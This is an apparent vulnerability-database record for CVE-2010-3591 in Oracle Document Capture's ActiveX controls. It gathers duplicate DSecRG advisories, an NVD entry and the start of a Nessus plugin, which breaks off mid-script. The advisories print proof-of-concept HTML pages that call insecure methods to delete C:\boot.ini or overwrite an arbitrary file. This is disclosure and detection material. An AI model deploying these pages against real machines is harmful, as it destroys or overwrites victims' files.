"sourceData": "` \nActiveX components contain insecure methods. \n \nDigital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) \n \n \nApplication: Oracle Document Capture \nVersions Affected: Release 10gR3 \nVendor URL: www.oracle.com \nBugs: insecure method, File overwriting, File deleting \nExploits: YES \nReported: 22.03.2010 \nVendor response: 31.03.2010 \nDate of Public Advisory:24.01.2011 \nCVE-number: CVE-2010-3591 \nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) \n \n \n \nDescription \n*********** \n \nOracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll \n \n \nDetails \n******* \n \n \nOracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} \n \nwhich is contains insecure method \"DownloadSingleMessageToFile\" that can delete any file in system. \n \nClass EasyMailPop3 \nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} \nNumber of Interfaces: 1 \nDefault Interface: IPOP3Main \nRegKey Safe for Script: False \nRegkeySafe for Init: False \nKillBitSet: False \n \n \n \nDetails \n******* \n \nAttacker can construct html page which call vulnerable function \"DownloadSingleMessageToFile\" from ActiveX component empop3.dll \n \nExample: \n \n<HTML> \n<HEAD> \n<TITLE>DSecRG</TITLE> \n</HEAD> \n<BODY> \n \n<OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT> \n \n<SCRIPT> \n \nfunction Exploit(){ \neds.DownloadSingleMessageToFile(1,\"C:\\\\boot.ini\",1); \n} \nExploit(); \n \n</SCRIPT> \n</BODY> \n</HTML> \n \n \nReferences \n********** \n \nhttp://dsecrg.com/pages/vul/show.php?id=305 \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \n \n \nFix Information \n************* \n \nInformation was published in CPU Jan 2011. \nAll customers can download CPU patches following instructions from: \n \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \nAbout \n***** \n \nDigital Security: \n \nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. \n \nDigital Security Research Group: \n \nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions. \n \n \nContact: research [at] dsecrg [dot] com \nhttp://www.dsecrg.com \nhttp://www.erpscan.com \n \n \n \n \nPolyakov Alexandr. PCI QSA,PA-QSA \nCTO Digital Security \nHead of DSecRG \n______________________ \nDIGITAL SECURITY \nphone: +7 812 703 1547 \n+7 812 430 9130 \ne-mail: a.polyakov@dsec.ru \n \nwww.dsec.ru \nwww.dsecrg.com www.dsecrg.ru \nwww.erpscan.com www.erpscan.ru \nwww.pcidssru.com www.pcidss.ru \n \n \n----------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n----------------------------------- \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/97868/DSECRG-11-005.txt"}], "cve": [{"lastseen": "2022-03-23T12:33:06", "description": "Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Internal Operations. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can overwrite or delete arbitrary files via a full pathname in the second argument to the DownloadSingleMessageToFile method in the EMPOP3Lib ActiveX component (empop3.dll).", "cvss3": {}, "published": "2011-01-19T16:00:00", "type": "cve", "title": "CVE-2010-3591", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591"], "modified": "2018-10-10T20:04:00", "cpe": ["cpe:/a:oracle:fusion_middleware:10.1.3.4", "cpe:/a:oracle:fusion_middleware:10.1.3.5"], "id": "CVE-2010-3591", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3591", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:fusion_middleware:10.1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:10.1.3.5:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Document Capture - Actbar2.ocx Insecure Method", "edition": 2, "published": "2011-01-26T00:00:00", "title": "Oracle Document Capture - Actbar2.ocx Insecure Method", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591"], "modified": "2011-01-26T00:00:00", "id": "EXPLOITPACK:D3D5A5A3F1D5DB6D6E0E319332895B56", "href": "", "sourceData": "Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt\n\nActiveX components contain insecure methods.\n\nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153\n\n\n\nApplication: Oracle Document Capture\nVersions Affected: Release 10gR3\nVendor URL: www.oracle.com\nBugs: insecure method, File overwriting\nExploits: YES\nReported: 22.03.2010\nVendor response: 31.03.2010\nDate of Public Advisory:24.01.2011\nCVE-number: CVE-2010-3591\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\n\n\n\nDescription\n***********\n\nOracle Document Capture contains ActiveX components that contains insecure methods.\n\nInsecure method in Actbar2.ocx\n\n\nDetails\n*******\n\nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}\n\nwhich is contains insecure method \"SaveLayoutChanges\" that can overwrite any unhidden file in system. \n\nClass ActiveBar2\nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}\nNumber of Interfaces: 1\nDefault Interface: IActiveBar2\nRegKey Safe for Script: True\nRegKey Safe for Init: True\nKillBitSet: False\n\n\n\nExploit\n*******\n\nAttacker can construct html page which call vulnerable function \"SaveLayoutChanges\" from ActiveX component Actbar2.ocx\n\nExample:\n\n<HTML>\n <HEAD>\n <TITLE>DSecRG</TITLE>\n </HEAD>\n <BODY>\n \n <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>\n \n <SCRIPT>\n \n function Exploit(){\n eds.SaveLayoutChanges(\"C:\\\\31337.txt\",1); \n }\n Exploit();\n \n </SCRIPT>\n</BODY>\n</HTML>\n\n\n\nReferences\n**********\n\nhttp://dsecrg.com/pages/vul/show.php?id=304\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\n\n\nFix Information\n*************\n\nInformation was published in CPU Jan 2011.\nAll customers can download CPU patches following instructions from: \n\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\nAbout\n*****\n\nDigital Security: \n\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\n\nDigital Security Research Group:\n\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\n\n\nContact: research [at] dsecrg [dot] com\nhttp://www.dsecrg.com\nhttp://www.erpscan.com\n\n\n\n\n\nPolyakov Alexandr. PCI QSA,PA-QSA\nCTO Digital Security\nHead of DSecRG\n______________________\nDIGITAL SECURITY\nphone: +7 812 703 1547\n +7 812 430 9130\ne-mail: a.polyakov@dsec.ru \n\nwww.dsec.ru\nwww.dsecrg.com www.dsecrg.ru\nwww.erpscan.com www.erpscan.ru\nwww.pcidssru.com www.pcidss.ru\n\n\n-----------------------------------\nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n-----------------------------------", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Document Capture - empop3.dll Insecure Methods", "edition": 2, "published": "2011-01-26T00:00:00", "title": "Oracle Document Capture - empop3.dll Insecure Methods", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591"], "modified": "2011-01-26T00:00:00", "id": "EXPLOITPACK:E67211FD19699AA1B1D6AF323C8719DF", "href": "", "sourceData": "Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt\n\nActiveX components contain insecure methods.\n\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) \n\n\nApplication: Oracle Document Capture\nVersions Affected: Release 10gR3\nVendor URL: www.oracle.com\nBugs: insecure method, File overwriting, File deleting\nExploits: YES\nReported: 22.03.2010\nVendor response: 31.03.2010\nDate of Public Advisory:24.01.2011\nCVE-number: CVE-2010-3591\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\n\n\n\nDescription\n***********\n\nOracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll\n\n\nDetails\n*******\n\n\nOracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\n\nwhich is contains insecure method \"DownloadSingleMessageToFile\" that can delete any file in system. \n\nClass EasyMailPop3\nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\nNumber of Interfaces: 1\nDefault Interface: IPOP3Main\nRegKey Safe for Script: False\nRegkeySafe for Init: False\nKillBitSet: False\n\n\n\nDetails\n*******\n\nAttacker can construct html page which call vulnerable function \"DownloadSingleMessageToFile\" from ActiveX component empop3.dll\n\nExample:\n\n<HTML>\n <HEAD>\n <TITLE>DSecRG</TITLE>\n </HEAD>\n <BODY>\n \n <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>\n \n <SCRIPT>\n \n function Exploit(){\n eds.DownloadSingleMessageToFile(1,\"C:\\\\boot.ini\",1); \n }\n Exploit();\n \n </SCRIPT>\n</BODY>\n</HTML>\n\n\nReferences\n**********\n\nhttp://dsecrg.com/pages/vul/show.php?id=305\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\n\n\nFix Information\n*************\n\nInformation was published in CPU Jan 2011.\nAll customers can download CPU patches following instructions from: \n\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\n\n\nAbout\n*****\n\nDigital Security: \n\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\n\nDigital Security Research Group:\n\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\n\n\nContact: research [at] dsecrg [dot] com\nhttp://www.dsecrg.com\nhttp://www.erpscan.com\n\n\n\n\nPolyakov Alexandr. PCI QSA,PA-QSA\nCTO Digital Security\nHead of DSecRG\n______________________\nDIGITAL SECURITY\nphone: +7 812 703 1547\n +7 812 430 9130\ne-mail: a.polyakov@dsec.ru \n\nwww.dsec.ru\nwww.dsecrg.com www.dsecrg.ru\nwww.erpscan.com www.erpscan.ru\nwww.pcidssru.com www.pcidss.ru\n\n\n-----------------------------------\nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n-----------------------------------", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-01-13T06:48:18", "description": "", "cvss3": {}, "published": "2011-01-26T00:00:00", "type": "exploitdb", "title": "Oracle Document Capture - Actbar2.ocx Insecure Method", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591", "2010-3591"], "modified": "2011-01-26T00:00:00", "id": "EDB-ID:16053", "href": "https://www.exploit-db.com/exploits/16053", "sourceData": "Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt\r\n\r\nActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153\r\n\r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods.\r\n\r\nInsecure method in Actbar2.ocx\r\n\r\n\r\nDetails\r\n*******\r\n\r\nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}\r\n\r\nwhich is contains insecure method \"SaveLayoutChanges\" that can overwrite any unhidden file in system. \r\n\r\nClass ActiveBar2\r\nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}\r\nNumber of Interfaces: 1\r\nDefault Interface: IActiveBar2\r\nRegKey Safe for Script: True\r\nRegKey Safe for Init: True\r\nKillBitSet: False\r\n\r\n\r\n\r\nExploit\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function \"SaveLayoutChanges\" from ActiveX component Actbar2.ocx\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.SaveLayoutChanges(\"C:\\\\31337.txt\",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=304\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "sourceHref": "https://www.exploit-db.com/download/16053", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T06:48:17", "description": "", "cvss3": {}, "published": "2011-01-26T00:00:00", "type": "exploitdb", "title": "Oracle Document Capture - 'empop3.dll' Insecure Methods", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3591", "2010-3591"], "modified": "2011-01-26T00:00:00", "id": "EDB-ID:16055", "href": "https://www.exploit-db.com/exploits/16055", "sourceData": "Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt\r\n\r\nActiveX components contain insecure methods.\r\n\r\nDigital Security Research Group [DSecRG] Advisory DSECRG-11-005 (internal #DSECRG-00154) \r\n\r\n\r\nApplication: Oracle Document Capture\r\nVersions Affected: Release 10gR3\r\nVendor URL: www.oracle.com\r\nBugs: insecure method, File overwriting, File deleting\r\nExploits: YES\r\nReported: 22.03.2010\r\nVendor response: 31.03.2010\r\nDate of Public Advisory:24.01.2011\r\nCVE-number: CVE-2010-3591\r\nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nOracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll\r\n\r\n\r\nDetails\r\n*******\r\n\r\n\r\nOracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\n\r\nwhich is contains insecure method \"DownloadSingleMessageToFile\" that can delete any file in system. \r\n\r\nClass EasyMailPop3\r\nGUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}\r\nNumber of Interfaces: 1\r\nDefault Interface: IPOP3Main\r\nRegKey Safe for Script: False\r\nRegkeySafe for Init: False\r\nKillBitSet: False\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAttacker can construct html page which call vulnerable function \"DownloadSingleMessageToFile\" from ActiveX component empop3.dll\r\n\r\nExample:\r\n\r\n<HTML>\r\n <HEAD>\r\n <TITLE>DSecRG</TITLE>\r\n </HEAD>\r\n <BODY>\r\n \r\n <OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>\r\n \r\n <SCRIPT>\r\n \r\n function Exploit(){\r\n eds.DownloadSingleMessageToFile(1,\"C:\\\\boot.ini\",1); \r\n }\r\n Exploit();\r\n \r\n </SCRIPT>\r\n</BODY>\r\n</HTML>\r\n\r\n\r\nReferences\r\n**********\r\n\r\nhttp://dsecrg.com/pages/vul/show.php?id=305\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\n\r\n\r\nFix Information\r\n*************\r\n\r\nInformation was published in CPU Jan 2011.\r\nAll customers can download CPU patches following instructions from: \r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security: \r\n\r\nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.\r\n\r\nDigital Security Research Group:\r\n\r\nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions.\r\n\r\n\r\nContact: research [at] dsecrg [dot] com\r\nhttp://www.dsecrg.com\r\nhttp://www.erpscan.com\r\n\r\n\r\n\r\n\r\nPolyakov Alexandr. PCI QSA,PA-QSA\r\nCTO Digital Security\r\nHead of DSecRG\r\n______________________\r\nDIGITAL SECURITY\r\nphone: +7 812 703 1547\r\n +7 812 430 9130\r\ne-mail: a.polyakov@dsec.ru \r\n\r\nwww.dsec.ru\r\nwww.dsecrg.com www.dsecrg.ru\r\nwww.erpscan.com www.erpscan.ru\r\nwww.pcidssru.com www.pcidss.ru\r\n\r\n\r\n-----------------------------------\r\nThis message and any attachment are confidential and may be privileged or otherwise protected \r\nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \r\nis strictly prohibited. If you have received this message in error, please notify the sender immediately \r\neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \r\nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \r\nstatements by e-mail unless otherwise agreed. \r\n-----------------------------------", "sourceHref": "https://www.exploit-db.com/download/16055", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-12T16:12:29", "description": "The Oracle Document Capture client installed on the remote host is potentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export utility. An attacker can exploit this to affect integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related to the EasyMail ActiveX control (emsmtp.dll).\n (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll' ActiveX controls can be exploited to overwrite arbitrary files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll ActiveX control can be exploited to overwrite arbitrary files or potentially cause a buffer overflow. (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2 SDK developer toolkit from Intergraph. Note also that Nessus has not tested for this issue but has instead relied only on the presence of the affected ActiveX components.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2011-02-04T00:00:00", "type": "nessus", "title": "Oracle Document Capture Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3591", "CVE-2010-3592", "CVE-2010-3595", "CVE-2010-3598", "CVE-2010-3599"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_DOCUMENT_CAPTURE_ACTIVEX.NASL", "href": "https://www.tenable.com/plugins/nessus/51873", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51873);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2010-3591\",\n \"CVE-2010-3592\",\n \"CVE-2010-3595\",\n \"CVE-2010-3598\",\n \"CVE-2010-3599\"\n );\n script_bugtraq_id(\n 45846,\n 45849,\n 45851,\n 45856,\n 45871\n );\n script_xref(name:\"EDB-ID\", value:\"16052\");\n script_xref(name:\"EDB-ID\", value:\"16053\");\n script_xref(name:\"EDB-ID\", value:\"16055\");\n script_xref(name:\"EDB-ID\", value:\"16056\");\n script_xref(name:\"SECUNIA\", value:\"42976\");\n\n script_name(english:\"Oracle Document Capture Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has one or more ActiveX controls installed that are affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Oracle Document Capture client installed on the remote host is potentially affected by multiple vulnerabilities :\n\n - An unspecified vulnerability exists in the Import Export utility. An attacker can exploit this to affect\n integrity. (CVE-2010-3598)\n\n - An information disclosure vulnerability exists related to the EasyMail ActiveX control (emsmtp.dll).\n (CVE-2010-3595)\n\n - Insecure methods in the 'Actbar2.ocx' and 'empop3.dll' ActiveX controls can be exploited to overwrite\n arbitrary files. (CVE-2010-3591)\n\n - An error in the 'WriteJPG()' method in the NCSEcw.dll ActiveX control can be exploited to overwrite\n arbitrary files or potentially cause a buffer overflow. (CVE-2010-3599)\n\n - An unspecified vulnerability exists in the Internal Operations component. (CVE-2010-3592)\n\nNote that the NCSEcw.dll control is actually from the ERDAS ECW/JP2 SDK developer toolkit from Intergraph. Note also that\nNessus has not tested for this issue but has instead relied only on the presence of the affected ActiveX components.\");\n # https://web.archive.org/web/20110831133022/http://dsecrg.ru/pages/vul/show.php?id=306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a54d748d\");\n # https://web.archive.org/web/20110919025431/http://dsecrg.ru/pages/vul/show.php?id=307\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c14789b4\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html%22\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32532e3d\");\n # https://geospatialcommunity.hexagon.com/s/article/Security-Advisory-for-ERDAS-ECW-JP2-SDK\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0180a060\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Oracle's Document Capture client, apply the patch from Oracle to disable the ActiveX controls.\n\nIf using a different application that includes the NCSEcw.dll control, set the kill bit for the affect control as\ndiscussed in Hexagon Geospatial's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-3599\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/04\");\n\n 